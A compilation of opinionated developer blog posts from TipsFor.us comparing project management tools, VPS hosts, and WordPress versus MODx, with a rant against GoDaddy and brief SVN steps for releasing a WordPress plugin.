A lot of developers, designers, students, and even web-hobbyists have a lot of items on their to-do lists for any particular site or project. You have to remember to fix that one CSS glitch, or rewrite a page to use some new function… the lists can be long and daunting. If you’re like me, you’re likely to forget half the stuff you need to do, and if it weren’t for project management software, I might as well stay in bed.

To put it mildly, there are *a lot* of applications out there that help you track bugs and manage projects, and this article only looks as a handful of them. Although the general purpose of these web-applications are similar, there are substantial differences in the pricing models, features, and usability, and hopefully this article will help you identify an application that is right for you. Or, if you’ve never really thought about using one before, maybe this article can help show you why project management / bug tracking software is good to have around.

This post only covers project management. I’ve discussed invoicing softare in another post. Some of these packages include time-tracking and invoicing, but that’s just a “nice-to-have” for the purposes of this article.

DISCLAIMER: I am not affiliated with any of these companies. None of the links in the article text are affiliate links; I don’t get a kickback or commission on referrals, I’m merely sharing my opinions and experiences using the software in the hopes that it’ll help inform the decisions of others.

Here’s the list… some of these are hosted solutions (software-as-service), and some you have to download and install.

Zoho

Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: This suite of Apps seems like they were hoping to get purchased by Google Apps… kinda similar, but more labored somehow.

My Intervals

Cheapest Option: Free

# Users:4

Wiki?:yes

Notes: You can get 1 project for free… but the functionality is limited.

Bit Bucket

Cheapest Option: Free

# Users: 5

Wiki?: yes

Notes: yet another solution…

Unfuddle

Cheapest Option: Free

# Users: 2

Wiki?: Yes, called “Notebooks”

Notes: This is one of my favorites for hosted solutions. I recommend Unfuddle — it’s not a silver bullet, but Unfuddle is a great tool for maintaining sanity: clean, simple, and easy to use. If you pay a little bit, you can unlock the best features.

Code Spaces

Cheapest Option: $3.99/mo

# Users: 2

Wiki?: yes

Notes: I felt the manager here was heavy… sorta Windowsy in a bad way, as in the interface needs to lighten up, but did have a good set of features.

Feng Office (Formerly OpenGoo)

Cheapest Option: $59/mo

# Users: unlimited

Wiki?: yes

Notes: this is a popular solution for its thoroughness. — you have to install it on your servers, which is actually a good thing for people storing sensitive info.

Achievo

Cheapest Option: Free

# Users: unlimited

Wiki?:no

Notes: This one you have to download and install on a server that runs PHP and MySQL — it includes features for sales teams. It’s built using the ATK framework.

Project Pier

Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: you gotta download and install this PHP/MySQL app. This is like the PHP cousin of Redmine, so if you don’t have the ability or resources to work with Ruby on Rails, this is a nice option.

Collabtive

Cheapest Option: Free

# Users: unlimited

Wiki?: Yes

Notes: This is a clean app — another one you have to download and install yourself. It’s a nice option (try the demo). The only thing I didn’t care for was that the app relies heavily on icons, so it’s hard to get your bearings. Good German engineering!

Redmine

Cheapest Option: Free

# Users: Unlimited

Wiki?: Yes

Notes: This is my favorite. It’s not perfect, but it’s a clean interface and easy to navigate. The major downside is that you have to install this yourself. Can you install Ruby on Rails on your server? No? Then this might not be for you.

BaseCamp

Cheapest Option: Free

# Users:unlimited, but only 1 project.

Wiki?: Yes

Notes: although this is hugely popular hosted solution and it’s well integrated with many software projects, this does not have a good ticketing system, and it does not tie into code versioning (e.g. SVN), so I don’t fully comprehend its popularity. It’s pretty good, but it seems over-hyped.

FogBugz

Cheapest Option: $25/mo

# Users: unlimited

Wiki?: yes

Notes: This integrates with their Kiln product to tightly integrate bug tracking with code revisions. There’s another product Trello that does visual project organization, but to be honest, I’m kinda confused by these interrelated projects.

Pivotal Tracker

Cheapest Option: $7/mo (free for non-profits)

# Users: 3

Wiki?: sorta

Notes: This is a serious app from the boys in Boulder for agile development — they’ve really thought through the way that large projects should be managed. It’s a hosted solution, but they can install it in on-site if needed.

Lighthouse

Cheapest Option: Free (for open source), otherwise $15/mo

# Users: 10

Wiki?: yes

Notes: another clean app. This is a hosted solution.

Google Code

Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: This option is available ONLY for open-source projects. It’s clean, with an easy interface. Updating wiki pages and bugs seems to triggers errors not infrequently, but I recommend this for any open source project.

Trac

Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: A lot of projects use this (e.g. WordPress): You download and install it. It’s written in Python and can run on several common databases.

Mantis

Cheapest Option: Free

# Users: unlimited

Wiki?: yes

Notes: It’s functional, but the UI/UX is pretty crusty. Sorry to poo-poo the hard work of the devs here, but I never felt like I could get clients to use this app… it’s a bit disjointed.

Jira

Cheapest Option: $10/mo

# Users: 10

Wiki?: Yes

Notes: This is popular with big corporations. The biggest disadvantage of this is that it’s HEAVY: you gotta have a rock-solid sysadmin to setup Tomcat on your server to install this behemoth.

Bugzilla

Cheapest Option: Free

# Users: unlimited

Wiki?: no

Notes: this is a powerful Perl application used by Firefox that can be the public face of your app. You have to download and install this.

GitHub

Cheapest Option: Free

# Users: unlimited

Wiki?: Yes

Notes: this thing is on fire — GitHub is THE thing right now. It’s wiki is a pain in the ass compared to Google Code when it comes to formatting special characters. Paid plans get private repos.

Hopefully that’s a good list to help you narrow down your choices. If that’s not good enough for you, check out Wikipedia’s comparison of issue tracking systems

Post from: TipsFor.us


Review of Web-based Project Management Software

You may remember my earlier comparison/rant of VPS Hosting Providers. GoDaddy was on that list of hosts to avoid, but recent events have loaded my arsenal with rant-fuel and I cannot contain myself any longer: GoDaddy is a horrible web host and a terrible company that not only wastes your time and money, it may actively be trying to F you in the A!

The Technical

First, the the technical stuff. This is stuff that actually happened. These are facts, and I invite any other developer to share similar experiences. I got a call late Friday night from a frenetic client with the horrible words: “THE SITE IS DOWN!!!”. Any developer who has heard those words on a Friday night knows that they can kiss their weekend goodbye, and so it was.

The site in question was hosted on a GoDaddy shared host. Ok, so what happened? Well, it’s an eCommerce site that required that a certain port be open for incoming and outgoing requests in order for the site’s software to communicate with the credit card processing (hosted on secure site somewhere else). Without warning, GoDaddy changed their firewall rules and they closed that port. Oops. That prevented the site from doing any business.

So what’s more frightening here? The fact that GoDaddy shut down this port without any warning, or the fact that they denied ever having that port open in the first place? In a separate incident, I had another GoDaddy server upgrade its version of PHP from 4 to 5. Any application developer will know that such a dramatic change in the underlying code can be catastrophic. And it was: the application completely broke because much of the code was not compatible with PHP 5. So the point of the story here is that I have personally experienced massive server changes on GoDaddy servers without any warning and sometimes without any acknowledgement. This is just not acceptable for any web host, and to date, I’ve only experienced this with GoDaddy.

And then it gets worse. The client wanted to keep his GoDaddy account, so he forked over the money to get a Linux VPS with GoDaddy. Man. The provisioning took over 12 hours and several calls to tech support. The GoDaddy dashboard is awful, and their ticketing system is equally poor: you can’t see your open tickets (!!!), so you have no idea what status they are in. You can chat with the techs (if the chat window doesn’t crash before you get through to somebody), but you cannot see any updates or add any information to your requests… you have to call to get information, and this can take a looooooong time.

But eventually GoDaddy got it up (heheh), and I started to configure the Linux Server with Plesk. Now the site required PHP 5.2.4 or greater, but the server shipped with PHP 5.1.6 (CentOS). There was no option to select different distros or different setups other than Plesk or cPanel on CentOS. So I started to get the server ready for take-off by updating packages and compiling a new version of PHP. I tried to download core updates… but out of the box, the repos were not correctly defined, and the VPS could not update itself. So I tried to run some updates by hand — we just needed PHP 5.2.4. So I tried to download and compile it. But the damn thing kept hanging. After some googling, it turns out that GoDaddy intentionally spikes the CPU which causes memory allocation failures. So the Plesk setup as offered by GoDaddy could not even put its own pants on.

So we had to pay an extra $10/month to get a WHM/cPanel server. So it was another 12 hours of provisioning (turns out the process hung, but without the ability to see the status of the ticket, I only got this info when I phoned in). But basically the same thing happened with the cPanel server: EasyApache could not finish executing due to memory/CPU throttling (not even on the command line). Something on those servers was completely F’d. As usual, GoDaddy techs denied everything, even when confronted with error logs. It was ridiculous and a waste of time for me and for the client (who hadn’t been able to sell anything on his site for about 48 hours at this point)

The final bit of ludicrousness was when we requested a separate IP address for the server so we could install the SSL certificate. With LiquidWeb, getting an extra IP address takes about 60 seconds. With GoDaddy? It took about 6 hours. Blink blink.

So the final solution here was to move this site over to my own server, which only took an hour or so. Instead of taking all weekend, it took only an hour. The conclusion is that GoDaddy is really good at creating billable hours, but not at actually having a working product.

The Non Technical

The non-technical stuff here is a bit more subjective, but it’s equally unflattering. You may remember the controversy when GoDaddy CEO Bob Parsons bragged about shooting and killing an elephant and a leopard. Mr. Parsons tried to play it off as some kind philanthropy because “elephants are destroying Zimbabweans’ crops”. In my opinion, anyone arrogant and/or stupid enough to justify their actions with a statement like that really deserves a punch in the dick. LEOPARDS DON’T DESTROY CROPS. And if Bob Parsons really cared about the plight of Zimbabweans’ crops, he’d do something more effective like fund charity organizations in Africa or help them build a fence. I mean, seriously… have you seen his Video Blog? Arguably, the elephant and leopard got treated more humanely with bullets to the face than those of us who watched a 61-year-old man ogle the scantily clad women grinding against him while he lectured us on “hiring great employees.”

Bob evaluates his employees greatness

And remember my disgust with QuickBooks? Looks like Bob had a hand in that as well: apparently, he sold his accounting software to Intuit in 1994.

And now with the internet censorship laws coming up in relation to the “Stop Online Piracy Act” (aka SOPA), we see that GoDaddy is a political animal. First they came out in support for SOPA. Then after a “maelstrom” of internet backlash, they later discontinued support for SOPA. But what bothers me is the casual internet citizen is fooled by this token gesture. It seems that it was a calculated move by GoDaddy where they make a public statement to placate the sheople, but behind closed doors, they still are working to game the system for personal gain and the expense of public freedom. This article about a judge forcing domains to be transferred to GoDaddy was alarming. How much does the system have to be corrupted if the legal system is ORDERING domains to be transferred to GoDaddy? Why does this sound like Iraq under Saddam Hussein where oil companies were ORDERED to do business with Saddam’s relatives. It just stinks to high heaven.

What to Do

Get your sites off of GoDaddy. They are Ok as a registrar if you can tolerate their idiotic dashboard and general ineptitude, but you’re wasting your life and your money if you host with them. Gotta love developers: here’s a good reference for how to move your domains off of GoDaddy: Moving Domains off of GoDaddy, but really, if you want to stick it to GoDaddy then you should call them and tie up their phone lines as much as possible. Have them walk you through how to transfer your domains…. step…. by…. step.

Sign up to boycott Godaddy here.

Find another registrar. NameCheap offers pretty much every TLD you can think of, and they at least as cheap.

If you need some good VPS hosting, I still have some space on my server: you get more horsepower than you’d get on your own VPS, and you don’t have to spend all the time setting the thing up. Contact me if you’re interested.

Post from: TipsFor.us


Why GoDaddy is a Horrible Host

I’m going to walk through a series of areas and compare and contrast both how both CMSs work in those areas. The comments here apply to WordPress 3.x and (mostly) to MODx Revolution, but MODx Evolution is mentioned where appropriate.

Basic Stuff

System Requirements

*Source: WordPress requirements, MODx requirements

If the requirements for MODx Revo look insanely detailed, ask yourself this: “do you really want to be guessing whether or not your server will support a given app?” MODx Revo does a pretty good job of testing for the necessary requirements during installation, so you don’t have any unexpected surprises.

Installation

WordPress offers its “famous” 5-minute install, and I give them credit where credit is due: WordPress is a simple web app to install, but to be fair, installing MODx Evolution is also very straightforward.

MODx Revolution has beefier requirements, and it’s far more likely you’ll run into troubles setting up your webserver permissions or PHP extensions (e.g. PDO). Moving a Revolution install to a new server is also a tricky operation that requires some patience (see this how-to).

Templating

Hands down, MODx offers the gold standard in templating. Expression Engine is a healthy second place, but only in my days of doing Perl development with the venerable Template Toolkit did I encounter a templating system that followed good MVC architectural principles as well as MODx.

What does that mean? It means that if you’re a front-end designer who likes to roll your own HTML and CSS, then MODx will grant you total freedom to implement the designs you want, whereas WordPress may result in headaches and holes punched in your walls (no comment on the convoluted mess that is Drupal and Joomla templates). I’ve posted previously about creating templates in MODx Evolution and how to import existing layouts into MODx Evolution, and the process in MODx Revolution is nearly identical (the only difference is the format of the placeholders).

In MODx, you can easily have multiple templates (i.e. layouts), and use any one of them for any page. In WordPress, the ability to use a specific template is possible only with pages, not posts. The thing that really gives me convulsions is understanding how WordPress formats its special pages, e.g. a category page, or an author page. See the image below as a reference for how WordPress formats page requests.

WordPress Template Hierarchy

See the official WordPress docs for Template Hierarchy for more information. I honestly have a hard time fathoming that this is the solution that actually got implemented… what other crazy ideas were on the drawing board?

Menus

MODx offers nearly infinite menu flexibility through use of menu-generating PHP Snippets, primarily WayFinder, but it’s not aimed at the average user. WordPress has a built-in GUI for creating menus, but I have experienced some bugs with it when using custom content types. Your WordPress theme may not support more than one or two menus, so in the end you may end up writing some code in your tmeplates (e.g. using my Summarize Posts plugin) so you can list the posts that you want to see.

In a nutshell, WordPress offers an easy GUI, but if you need more customization MODx’s flexibility here is far greater.

Plugins

WordPress has a huge number of user-contributed plugins available, whereas MODx has relatively few. The sheer number is not a good comparison, however; I downloaded and tested hundreds of plugins in the process of writing my WordPress book, and the number of plugins that are unusable due to sophmoric errors or plain-old bad coding is huge. I estimate that at least half of the plugins in the WordPress repository are unusable, and perhaps only a tenth of them are worth using. There are crufty plugins in the MODx repo to be sure, but the playing field is more even than you might think.

The real difference here comes when you have to write your own code: MODx is a lot easier to work with with a shorter learning curve for a majority of code, whereas learning the ropes of WordPress plugins requires more guidance (hey, did I mention we wrote a book about that?).

Architecture

This is an area that is hard to discuss unless you’re a geek, but in a word, MODx offers a robust and well-architected MVC framework under the hood that can make writing custom plugins (Snippets, manager pages, et al) a breeze. The work done by Jason Coward and Shaun McCormick is really astounding.

Some of the limitations to WordPress are really staggering: it is basically a stateless application, so by default it does not use sessions, and nearly all of its API functions exist as procedural functions in the main namespace, so naming collisions are a big concern when authoring plugins. This makes certain functionality damn near impossible in WordPress. For example, creating a WordPress application with a login portal and access to custom data models would require an enormous amount of time. Even accessing WordPress’s posts and categories is difficult at times; I basically had to rewrite core WordPress functionality with another plugin (Summarize Posts) just to get the menus and summaries I needed for one recent site.

Another severe limitation is WordPress is that all extensions to the core occur via plugins that are triggered by system events (confusingly they are loosely categorized into “actions” and “filters”). This construct can be awkward at times, and the WordPress architecture is showing its age as the number of events exponentially increases, whereas the amount of documentation for them continually wanes. Realistically you can get WordPress plugins to do just about everything you need using only a handful of events, but debugging someone else’s plugins is a nightmare: there is no centralized location listing which events are being hooked into, and new events are often created and executed on the fly. Debugging WordPress plugins is like Alice’s trip down the rabbit hole: majorly trippy,and you don’t know if you’ll ever come out.

User management is another area where MODx dwarfs WordPress: Revolution can handle totally granular control of permissions, but it is admittedly overly complex for 90%+ of use cases. Evolution offers a much more sensible permissions scheme that covers most use cases.

MODx offers much more sensible implementations of custom code: like WordPress it uses event-driven plugins, but it also uses custom PHP snippets which can be placed anywhere on a page or in a template.

Another impressive feat is how MODx Revolution has abstracted the database into a separate coding layer — that means it is relatively easy to interface with custom database tables (or even to other database engines) using code that is completely database agnostic (support for SQLite and PostGREs is in the works). That’s some seriously geeky stuff that has kept me awake at night trying to comprehend how they accomplished that. MicroSoft has even worked directly with the MODx team because MODx’s architecture is flexible enough that it can run on an all MicroSoft stack (i.e. IIS and MS-SQL). I can’t think of a single other system that switch-hits as well as MODx.

Dashboard

WordPress offers a clean manager dashboard for its administrators which relies on the jQuery JavaScript library to provide AJAX functionality and smooth user experience. It’s pretty easy to find your way around.

WordPress Manager dashboard

MODx underwent a huge change in its manager dashboard between Evolution and Revolution, and the Revolution dashboard is overwhelming for many. Evolution’s dashboard is cleaner and snappier.

MODx Evolution Dashboard

MODx Revolution’s manager dashboard is still being optimized. It’s based on ExtJS. For those of you not familiar with ExtJS, it was based on YUI (the Yahoo User Interface library), and it offers some fatastically powerful features for building interfaces for web applications. My only complaint with it is that it’s heavy: the MODx Revo dashboard can take a long time to load, and sometimes clicking on buttons and links feels unresponsive.

MODx Revo dashboard

Blog

Everybody wants a blog, just like everybody wants a shiny new car. Authoring blogs has been a core competency of WordPress, and they get massive props for making them very simple to setup: out of the box, you can get a blog up and running with integrated tags and categories and comments within minutes. It’s really what WordPress is all about: blogging. WordPress even has some nice security features in place with its Akismet spam filter.

Contrary to some of the on-line murmurings out there, both versions of MODx can run blogs, but until MODX 2.2, the process to set them up was painfully laborious in comparison. The Articles extra for MODX gives you a quick and easy blog — it can even import your posts from WordPress, so the gap between the two systems is closing quickly. The only thing it doesn’t do as well as WordPress right out of the box is its taxonomies (tags and categories): you still have to do some configuration to get those configured how you want them, but as the docs say:

“MODx Revolution is not blogging software, but rather a full-blown Content Application Platform, it doesn’t come pre-packaged with a cookie-cutter blogging solution.” 

Custom Content (CMS functionality)

If blogging is where WordPress shines, then CMS functionality is where MODx clearly has the upper hand. WordPress does support custom fields for its posts and pages, and in version 3.x, they support additional “post types”, so finally WordPress is getting some traction as a CMS, but it’s still a bit of a toy in comparison to MODx.

One of the biggest problems with WordPress as a CMS is its lack of support for sensible custom fields: for each post or page, you have to manually add the same custom fields over and over again, and by default, the custom fields are always simple text fields. I have attempted to rectify this in my Custom Content Type Manager plugin, and my plugin does a lot to give WordPress CMS capabilities, but it still represents a series of awkward workarounds that stretches the WordPress core nearly to its breaking point.

One related area here is how MODx can manage and serve static files via what MODx calls “Static Resources”. This is a great way to enforce permissions on viewing, streaming, or downloading static files (e.g. PDFs or Flash movies). WordPress just flat out can’t do that.

Although MODx offers greater flexibility, WordPress’ integration is a bit cleaner for the manager user (it’s a holy pain in the ass for the developer, but if you download my plugin you should avoid this unpleasantness). When WordPress registers a new “post type”, you get a nice menu icon in your dashboard and it’s really clear to the manager that he/she is adding a new post, page, or movie (etc). For example, if you want to add a movie post, you’d click on “Add Movie”. It’s really quite logical. In MODx, this same type of distinction occurs at the template level. Architecturally, this makes sense, but it’s confusing for the manager user, because it may not be at all clear that they need to add a “normal” page (i.e. resource), and then choose to use the “movie” template. I’m planning a MODx plugin to help rectify this UI “wart”.

A custom post type in WordPress

SEO

SEO is the an cyclical buzz, and at the moment, a lot of SEO guys are hailing WordPress as the holy grail of search-word wad-shooting. To be blunt, I think SEO is largely an over-hyped crock of crap. If you build a well-structured site with good content, your pages will show up in search results: if there is a site out there with awesome content that is not showing up in relevant search results, I have yet to see it. Search engine optimization is often a pseudo-science practiced by get-rich-quick marketeers who are convinced that they can turn lead into gold by over-hyping a site with various gimmicks. 90% or more of SEO should have to do with creating good content, and perhaps the last 10% of your efforts should go into polishing your site. It can be used to improve search results, but it tends to fail when you try to make search results come out of thin air. Too often I have seen companies do this the wrong way around: they spend 90% of their time publicizing a site that is a vapid cesspool instead of spending their time making a site that’s worth visiting. At best, SEO techniques are constantly changing as Google updates and refines their indexing algorithms. If you optimize your site today and Google farts tomorrow, all of your work may be for naught. Do your due dilligence, but it’s just not worth spending inordinate amounts of time tring to beat Google at their own game.

Rants aside, both systems offer ample ways to do search engine optimization. Assuming that you have good content, the rest of the process boils down to having well structured HTML (which relies on a solid templating system), and the ability to effectively index your pages. WordPress offers built-in taxonomies (categories and tags) for flagging your posts, and MODx can be set up to do this rather easily by using an Auto-Tag custom field (a.k.a. a MODx “Template Variable”).

MODx offers a much more flexible system for generating URLs (basically you can use any URL you want for any page). WordPress does offer flexibility here, except for its special pages (e.g. category listings or author pages).

Security

No system is 100% secure. MODx has had relatively few serious exploits; WordPress has had many, no doubt due in part to its popularity. For what it’s worth, I have had WordPress and MODx Evolution sites hacked, but not yet a Revolution site. It’s hard to quantify how secure an application is… I’d love to see the detailed forensic results of a penetration test against default installations of both CMS’s. In general though, the WordPress architecture is primitive and more ripe for being hacked: it’s more difficult to lock down spaghetti code. WordPress also offers many more plugins, and the plugin authors tend to be less experienced, so their code is more likely to have security holes.

There are many fingerprinting utilities out there that will attempt to locate known weaknesses in plugins, and WordPress is more easily fingerprinted; MODx Revo allows you to change default locations for the MODx manager or to even remove it from public view altogether. There are some discussions in the MODx Forums about how to harden MODx, but I haven’t yet seen a detailed how-to on how to eliminate the most common attack vectors. There are also good posts out there for hardening WordPress.

I reported a nasty vulnerability in phpThumb that affected MODx and numerous other CMS’s (phpThumb is a popular image manipulation library), but the MODx Revo architecture prevented the exploit from succeeding on Revo (good job to Shaun and Jason for architecting the connectors in the way they did).

Support

This is another area that is pretty black and white in my opinion: WordPress support sucks. Although WordPress is more popular if you look at the numbers, you wouldn’t know it if you post questions in the WordPress Forums. I have rarely gotten any useful answers (if I got answers at all): anything beyond simple inquiries tend to go unanswered, leaving me alone in the dark reverse-engineering damn near everything.

My other gripe with WordPres is their weird distinction between WordPress.com and WordPress.org. You can host your blog at WordPress.com, and then you get more support, but it is effectively software as service: you can’t upload plugins and you can’t modify code, so the interface suddenly becomes a bit like BlogSpot.

By contrast, the MODx Forums are full of helpful people. It’s a great place to be: it’s not uncommon to get responses from the core team on almost any level of inquiry, from trivial to cerebral meltdowns. There are some superstar participants, such as Susan Ottwell and Bob Ray, who have both contributed immensely helpful posts and tutorials on how to use MODx. MODx also offers commercial support; it’s still in its infancy, but for a yearly fee, you can get access to a kind of “MODx hotline” and get help resolving MODx issues on your sites.

Documentation

In the same breath as support, I must mention documentation. In general, documentation for both systems is lacking, in some areas painfully so. While using WordPress, I have often I have searched for hours trying to find a way to do a certain thing, only to end up grepping through the code base and deciphering the raw code myself. Frequently the official documentation has holes or in some cases, it’s just plain wrong. The best resources for some advanced WordPress features are blogs written other developers.

MODx’s documentation is also frustratingly AWOL on a number of topics, but least the MODx code base is integrated with a standard documentation publishing system so if needed you can see for yourself how the functions are structured without having to grep through the code base. The vibrant MODx forums fill in a lot of the holes in the documentation, and that’s a huge benefit for any open-source project.

Scalability

WordPress can handle a huge number of posts, but it does get bogged down with a large number of pages, and there are lots of whisperings about this (e.g. here). I suspect it has to do with WordPress’ convoluted templating system (see above), which makes me wonder what the limits are on custom post types.

MODx Evolution suffered from a limit of approximately 5000 resources (in MODx, pages and posts are types of resources), but that limit has been corrected in an upcoming release thanks largely to the efforts of Charlie over at ProWebscape.com.

MODx Revolution has no such limits: it offers a great built-in caching system that allows it to serve pages very quickly. It has been benchmarked as twice as fast as Expression Engine (see this blog post).

More importantly, MODx Revolution was built with scaling in mind: it stores session data in the database, so it is easily deployed on load-balanced servers. This is hugely important if you are building a site that might one day get massive amounts of traffic; WordPress can be deployed like this, but such usage is not generally anticipated. I don’t know of many large commercial sites running WordPress (in fact, I only found one: 9rules.com).

Conclusion

I do like both systems, and I use them both daily. WordPress has a much lighter footprint and is easier to use for a large number of use-cases: if you just need to get a site out the door fast, then WordPress is really hard to beat. WordPress is plug-and-play for just about everything and that saves you hours of setup time, so it can be the right solution for a majority of sites. But the more customizations you require (particularly in scripts or in layouts), then the more appealing MODx becomes: WordPress has thousands of plugins available, but if those aren’t meeting your needs, I’ve found certain types of customizations to be extremely difficult in WordPress whereas most often, MODx handles them with ease. Doing things like building web applications with strict formatting requirements is much easier in MODx because it’s built more as a launchpad for customizations: it’s really more of a content management framework (CMF). MODx Evolution is the best system I’ve used for building small to medium sized informational/brochure sites, WordPress rules as the blogging king, and I’ve been very impressed with how easily I can build web applications using MODx Revolution. There isn’t one tool that’s right for every job; the more projects you complete, the better idea you’ll have as to which system will accomplish your requirements more easily, and hopefully this article helps you spot more of what each system is good at.

Post from: TipsFor.us


WordPress vs. MODx

These aren’t affiliate links unless otherwise indicated (hey, if you want to throw us a bone for saving you the pain of experiencing these guys yourself, then please, feel free to click the affiliate link: it costs you nothing and it is your way of saying “thanks for saving me the trouble of learning this stuff the hard way”).

LiquidWeb

LiquidWeb has impressed me with its clean integrations and its “heroic support”. That doesn’t mean they’ve been able to fix every problem I’ve had, but to be fair, a lot of the tricky stuff was weird 3rd party installs that *I* struggle with greatly. But they have been very responsive in their tickets and I’ve never felt abandoned or in the dark.

The standard VPS’s offer a good value, but if you need more horsepower, their SmartServers offer a nice combination of virtual/cloud and dedicated qualities, and it’s a good combo for many folks. These come by default with WHM/cPanel, so it’s easy to set up sub-accounts with their own logins. Throw me a Bone (affiliate link)

Media Temple

This is a popular option, although I’m not sure why… their cloud servers go down frequently, they’ve had several pretty severe security issues, and using SSH on their servers is a holy pain in the ass because SSH dumps you in some foreign directory miles away from your home directory, whereas FTP takes you to your home directory. What? Yes, it is obnoxious and confusing, and they disconnect your SSH session after 5 minutes, which is approximately 1 minute less than the time it takes you to RTFM through your notes and emails to find where the hell your home directory is or which command you need to run to escalate yourself to the proper user to be able to do anything useful. MediaTemple uses Plesk to offer control panels to their clients, and Plesk is a nightmare if you ever try to do any sysadmin work on the command line. I’ve had a couple clients on MediaTemple, and it just seems like it’s a rocky road with bumps in the service and difficulties in doing basic tasks. It’s not the worst out there, but I wouldn’t rate MediaTemple as anything better than mediocre.

VPS.net

I do not recommend these guys. They do have a nice looking site and what looks to be a nice product, but my experience with them was wholly negative. “Jeez”, you might be thinking, “don’t flame a brother in writing!”, but sit down around the campfire and let me tell you why I feel completely comfortable doing so….

It all started when I set up a VPS server with VPS.net and I signed up for their paid snapshots knowing that I was liable to screw up my server at some point and I’d want to roll back to a snapshot image. Sure enough, I borked my server by removing the sqlite package, which completely destroyed the functionality of my yum utility (don’t ever do what I did, by the way). “No problem”, I thought, “I’ll just roll back.” Well, the restoration process had a fatal flaw, which completely toasted my server. After using their “restoration” utility, I didn’t just have a server with a broken yum utility, I had a completely fried server (ooo… that’s a bad code taco on that one). The people over at VPS.net were completely unwilling to admit the problem. I wasted about 2 days waiting for them to either fix the problem or to just come clean and say “hey, we’re really sorry, but we had a glitch in our snapshot utility so we only have partial backups of your server.” No. They hemmed and hawed and wasted my time for 2 days until finally one of the techs admitted that there had been a problem. I think he was probably later executed by firing squad for insubordination and refusing to tow the party line. I needed to clock in about 40 hours (all un-billable, by the way) to rebuild the server from scratch, and they acted like the Soviets when Chernobyl blew up: in typical fashion they denied anything happened until European scientists started measuring massive amounts of radiation and said “uh, comrades… did something happen at your reactor?”

While waiting days for a response (all while my server and all of its sites were completely down), my patience got exhausted, so I finally threatened to make a blog post like this one. The CTO jumped in saying “I was approaching this in the wrong way”. I listed the several tickets that I had filed that had gotten no response for 48 hours (even ones that *he* had initially responded to). And then even the CTO stopped responding to my requests for information (read: he must have known how badly they screwed up). His response was literally an advertisement: he blabbed on about how awesome their servers were and what great new offerings were available. I felt like he had just run over my dog, and instead of apologizing for killing my best friend, he was yammering on about awesome his car was with its dual-hemi’s, turbo-charged engine and high-performance tires. The final “kiss my ass” message they sent me was a legalese “F-U” which basically stated that none of their services, including backups, were guaranteed. Seriously, I don’t often say stuff like this this in writing, but VPS.net can go french kiss a donkey’s ass. I gave them every opportunity to respond to my questions or to justify their actions, and they ignored me, so I feel I’m being more than fair.

So dealing with VPS.net cost me several thousand dollars, it almost cost me a client, and their ineptitude set me back on several high priority projects, and their response to a completely legitimate issue was childish and unprofessional, and my requests for just basic professionalism were ignored. So there you have it: my rant against VPS.net. Use their services at your own risk.

VPSlink.com

These guys offer a simple no-frills hosting package, and I’ve used them for several dev projects over the years. Nothing fancy, but they are responsive to the requests, and I’ve only had minimal fuss with their servers and their control panel is easy to navigate. They may not give you as much RAM as some for the price, but they do give you lots of CPUs (like 16!). I like these guys and I give them a good thumbs up. There is no cPanel type dashboard for sub-accounts, so this one is only for command-line sysadmins only.

ServerAxis.com

This is another no-frills VPS system that offers some pretty nice stats for the price: lots of RAM and a good amount of CPU. They offer a few more options than VPSLink (e.g. you can pay extra to get an external backup volume mounted to your server), and they are a bit more scalable, but I didn’t find their admin panels very intuitive, so I’ve lost time fumbling through them. There is no cPanel type dashboard for sub-accounts, so this one is only for command-line sysadmins only, but still a solid thumbs-up with these guys.

GoDaddy

Ah yes, now even GoDaddy is offering VPS services (hey, we said this stuff is becoming a commodity). The prices there look competitive, but my experiences with GoDaddy as a host have been mindbogglingly poor. Their shared hosting is a complete disaster — hands down, it’s the worst I’ve seen… they arbitrarily limit functionality, it takes hours to complete tasks that take only minutes on other hosts, and all for a cost that is higher than their competitors. I even had one of their techs tell me that the MySQL dump was “working perfectly” when the log file showed clearly that there was an error. Blink. Are they blind? Or just stupid? They also had zero understanding of how DNS records worked, so they weren’t able to offer any assistance in configuring a custom zone file. Furthermore, their dashboard is impossibly confusing to navigate. Do you know that weird castille soap by Dr. Bonner? I’m pretty sure the intern that did the layout for that soap is the same person who did the UI for GoDaddy’s control panel because I always have to dial their support # when I have to do anything in there.

Layout designed by GoDaddy: Worst Layout Ever

I mean seriously… can you read that?

So even though these look like competitive prices, I have severe reservations about using GoDaddy as anything more than a registrar. Hey, I want to jump on Danica Patrick as much as the next horny guy, but maybe if they spent some time cleaning up their site and services instead of Super Bowl ads and models, they’d have a product worth recommending, but as it stands, you should pass on GoDaddy as a host.

Amazon cloud EC2

This is a popular option because hey, it’s Amazon… but I’ve found EC2 cloud stuff to be a pain in the ass to use simply because you get lost on the command line. It’s worse than MediaTemple from a command-line standpoint. In my opinion, being on the cloud means your data theoretically is always there (there are outages), but if you’re coming in via SSH, then you can’t find it. Haha. Only sort of kidding there. In general, this isn’t a very nice option for those people doing simple web hosting types of services. It’s more appropriate for companies doing persistent application deployments.

Other Providers

I feel obligated to mention the following 2 providers because so many people I work with recommend them highly:

• Linode.com
• SliceHost.com

I don’t have first hand experience with them, so I can’t comment directly.

Conclusion

There are a lot of options out there, but with enough time, patience, and trouble-shooting elbow-grease, you can find a web host that works for you.

Post from: TipsFor.us


Comparison of VPS Providers

Click here to view the embedded video.

Below is the short summary of what is presented in the video.

How to release updates to your WordPress plugin (quickie version)

1. Make the updates to your code, fix any errors, add new features.
2. Update your plugin’s main file (the one with the information header) so that it references the new version of your plugin, e.g.
   Version: 0.5
3. Update your readme.txt file to describe the changes you have made, but DO NOT change the Stable Tag. This number must point to an existing directory inside your repo’s tags directory.
4. Save your files, then commit your changes to the SVN repo, e.g. svn commit . -m "My new version is ready"
5. Tag the new version using the SVN copy command to copy the trunk new a new numbered directory in tags, e.g. svn copy http://plugins.svn.wordpress.org/your-plugin/trunk http://plugins.svn.wordpress.org/your-plugin/tags/0.5
   Remember: the tagging operation is just a copy operation.
6. By performing the tagging (i.e. copy) operation, a new directory has been created inside the tags directory. So only now can you safely update your readme.txt file’s Stable Tag, e.g.
   Stable tag: 0.5
   
   That number acts as a pointer to the corresponding folder inside of the tags directory (it would point to http://plugins.svn.wordpress.org/your-plugin/tags/0.5 in this example).
7. Commit your changes to the readme.txt file. This will ensure that the Stable Tag attribute points to the newly created version: svn commit . -m "Updating the stable tag"
